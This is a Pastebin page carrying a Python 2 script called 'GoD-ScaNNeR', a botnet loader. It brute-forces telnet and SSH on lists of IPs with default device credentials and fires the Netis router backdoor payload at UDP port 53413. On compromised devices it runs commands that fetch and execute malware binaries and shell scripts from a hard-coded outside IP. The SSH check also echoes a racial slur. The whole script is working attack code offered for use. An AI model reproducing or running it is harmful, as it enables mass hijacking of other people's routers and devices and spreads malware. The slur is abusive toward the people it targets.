API tools faq
paste
Advertisement
Dr-L0v3

GoD-ScaNNeR (TELNET, SSH, NETIS)

Dr-L0v3
Dec 22nd, 2017
659
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 8.14 KB | None | 0 0
raw download clone embed print report
  1. #!/usr/bin/python
  2. """
  3.    GoD-ScaNNeR (NeTiS/TeLNeT/SSH)
  4.            
  5. """
  6. import threading, sys, time, random, socket, re, os, paramiko
  7. from Queue import *
  8. from sys import stdout
  9.  
  10. if len(sys.argv) < 3:
  11.         print "Usage: python "+sys.argv[0]+" <threads> <list>"
  12.         sys.exit()
  13.  
  14. # USER AND PASS LISTS #
  15. usernames = ["root", "admin", "root", "root"] #DONT CHANGE
  16. passwords = ["oelinux123", "admin", "Zte521", "vizxv"] #DONT CHANGE
  17. ssh_passwords = ["admin:1234", "root:1234"] #CAN CHANGE
  18. loginpayload = "AAAAAAAAnetcore\x00" #DONT CHANGE
  19.  
  20.  
  21. # START CONFIGURATION #
  22. url = "http://103.194.169.245/tftp" # ARM4 Binary
  23. sh_file = "http://103.194.169.245/bins.sh" # SH File
  24. commandpayload = "AA\x00\x00AAAA cd /var/; rm -rf sshd; wget http://103.194.169.245/sshd || tftp -r sshd -g 103.194.169.245; chmod 777 sshd; ./sshd; rm -rf sshd\x00" # MIPSEL Binary
  25.  
  26. # DONT TOUCH
  27. spawn_shell = "cat | sh"
  28. paramiko.util.log_to_file("/dev/null") #quiets paramiko output
  29. threads = int(sys.argv[1])
  30. ips = open(sys.argv[2], "r").readlines()
  31. ports = ["23", "22", "53413"]
  32. queue = Queue()
  33. qcount = 0
  34. binary = url.split("/")
  35. binary = binary[3]
  36. ip = binary[2]
  37. found = 0
  38. count = 0
  39.  
  40. for ip in ips:
  41.     qcount += 1
  42.     stdout.write("\r[%d] Added to queue" % qcount)
  43.     stdout.flush()
  44.     queue.put(ip)
  45. print "\n"
  46.  
  47. def readUntil(tn, string, timeout=10):
  48.     buf = ''
  49.     start_time = time.time()
  50.     while time.time() - start_time < timeout:
  51.         buf += tn.recv(1024)
  52.         time.sleep(0.01)
  53.         if string in buf: return buf
  54.     raise Exception('TIMEOUT!')
  55.  
  56. def worker():
  57.     try:
  58.         while True:
  59.             try:
  60.                 if queue.empty() == True:
  61.                     sys.exit(1)
  62.                 ip = queue.get()
  63.                 ss = sssh(ip)
  64.                 ss.start()
  65.                 tt = ttelnet(ip)
  66.                 tt.start()
  67.                 nn = nnetis(ip)
  68.                 nn.start()
  69.                 queue.task_done()
  70.             except:
  71.                 pass
  72.     except:
  73.         pass
  74.  
  75. class ttelnet(threading.Thread):
  76.         def __init__ (self, ip):
  77.             threading.Thread.__init__(self)
  78.             self.ip = str(ip).rstrip('\n')
  79.         def run(self):
  80.             try:
  81.                 tn = socket.socket()
  82.                 tn.settimeout(5)
  83.                 tn.connect((self.ip,23))
  84.                 time.sleep(0.2)
  85.                 hoho = ''
  86.                 hoho += readUntil(tn, ":")
  87.                 if "mdm9625" in hoho:
  88.                     r00t = 0
  89.                     username = usernames[1]
  90.                     password = passwords[1]
  91.                     tn.send(username + "\n")
  92.                 elif "9615-cdp" in hoho:
  93.                     r00t = 1
  94.                     username = usernames[0]
  95.                     password = passwords[0]
  96.                     tn.send(username + "\n")
  97.                 elif "ogin" in hoho and "9615-cdp" not in hoho:
  98.                     zte = 1
  99.                     username = usernames[2]
  100.                     password = passwords[2]
  101.                     tn.send(username + "\n")
  102.                 elif "ogin" in hoho and "mdm9625" not in hoho:
  103.                     zte = 1
  104.                     username = usernames[2]
  105.                     password = passwords[2]
  106.                     tn.send(username + "\n")
  107.                 if "(none)" in hoho:
  108.                     zte = 0
  109.                     vizxv = 1
  110.                     username = usernames[3]
  111.                     password = passwords[3]
  112.                     tn.send(username + "\n")
  113.                 if "BCM" in hoho:
  114.                     zte = 0
  115.                     vizxv = 0
  116.                     BCM = 1
  117.                     username = usernames[1]
  118.                     password = passwords[1]
  119.                     tn.send(username + "\n")
  120.             except Exception:
  121.                 tn.close()
  122.             try:
  123.                 hoho = ''
  124.                 hoho += readUntil(tn, ":")
  125.                 if "assword" in hoho:
  126.                     tn.send(password + "\n")
  127.                     time.sleep(3)
  128.             except Exception:
  129.                 tn.close()
  130.             try:
  131.                 mp = ''
  132.                 mp += tn.recv(1024)
  133.                 if "#" in mp or "$" in mp or "~" in mp or ">" in mp or "root@" in mp: # !DO NOT CHANGE ANYTHING! #
  134.                     if r00t: tn.send("cd /tmp; wget "+url+" -O phone; chmod 777 phone; ./phone; rm -rf phone" + "\n"); print "\033[32m[PHONE] command sent %s!\033[37m"%(self.ip); time.sleep(8); tn.close()
  135.                     if not r00t: tn.send("su" + "\n"); readUntil(tn, "Password:"); tn.send(passwords[0] + "\n"); time.sleep(1); tn.send("cd /tmp; wget "+url+" -O phone; chmod 777 phone; ./phone; rm -rf phone" + "\n"); print "\033[32m[PHONE] command sent %s!\033[37m"%(self.ip); time.sleep(8); tn.close()
  136.                     if zte: tn.send("cd /var/; rm -rf busybox filename; wget "+url+" -O filename ; cp /bin/busybox ./; busybox cat filename > busybox;./busybox ;rm -rf busybox filename" + "\n"); print "\033[32m[ZTE] command sent %s!\033[37m"%(self.ip); time.sleep(8); tn.close()
  137.                     if vizxv: tn.send("cd /var/ || cd /tmp/ || cd /; tftp -r "+binary+" -g "+ip+"; chmod 777 "+binary+"; ./"+binary+"; rm -rf "+binary+""); print "\033[32m[VIZXV] command sent %s!\033[37m"%(self.ip); time.sleep(8); tn.close()
  138.                     if BCM: tn.send(spawn_shell + "\n"); time.sleep(1); tn.send("cd /tmp; wget "+sh_file+" -O l.sh; sh l.sh; rm -rf /tmp/*" + "\n"); print "\033[32m[BCM] command sent %s!\033[37m"%(self.ip); time.sleep(8); tn.close()
  139.                     found += 1
  140.             except Exception:
  141.                 tn.close()
  142.                 pass
  143.  
  144. class nnetis(threading.Thread):
  145.         def __init__ (self, ip):
  146.                 threading.Thread.__init__(self)
  147.                 self.ip = str(ip).rstrip('\n')
  148.         def run(self):
  149.                 s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
  150.                 try:
  151.                         # sends netis payload to almost everything lmao
  152.                         s.sendto(loginpayload, (self.ip, 53413))
  153.                         time.sleep(1)
  154.                         s.sendto(commandpayload, (self.ip, 53413))
  155.                         time.sleep(2)
  156.                 except Exception:
  157.                         pass
  158.  
  159. class sssh(threading.Thread):
  160.     def __init__ (self, ip):
  161.         threading.Thread.__init__(self)
  162.         self.ip = str(ip).rstrip('\n')
  163.     def run(self):
  164.         x = 1
  165.         while x != 0:
  166.             try:
  167.                 username='root'
  168.                 password="0"
  169.                 port = 22
  170.                 ssh = paramiko.SSHClient()
  171.                 ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
  172.                 dobreak=False
  173.                 for passwd in ssh_passwords:
  174.                     if ":n/a" in passwd:
  175.                         password=""
  176.                     else:
  177.                         password=passwd.split(":")[1]
  178.                     if "n/a:" in passwd:
  179.                         username=""
  180.                     else:
  181.                         username=passwd.split(":")[0]
  182.                     try:
  183.                         ssh.connect(self.ip, port = port, username=username, password=password, timeout=5)
  184.                         dobreak=True
  185.                         break
  186.                     except:
  187.                         pass
  188.                     if True == dobreak:
  189.                         break
  190.                 badserver=True
  191.                 stdin, stdout, stderr = ssh.exec_command("echo nigger")
  192.                 output = stdout.read()
  193.                 if "nigger" in output:
  194.                     badserver=False
  195.                 if badserver == False:
  196.                     print "\033[36m[SSH] command sent %s!\033[37m"%(self.ip)
  197.                     ssh.exec_command("cd /tmp; wget "+sh_file+" -O l.sh; sh l.sh; rm -rf /tmp/*")
  198.                     time.sleep(3)
  199.                     ssh.close()
  200.                 if badserver == True:
  201.                     ssh.close()
  202.             except:
  203.                 pass
  204.             x = 0
  205.  
  206. for g in xrange(threads):
  207.     t = threading.Thread(target=worker)
  208.     t.setDaemon(True)
  209.     t.start()
  210.    
  211. queue.join()
  212. print "Finished!"
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!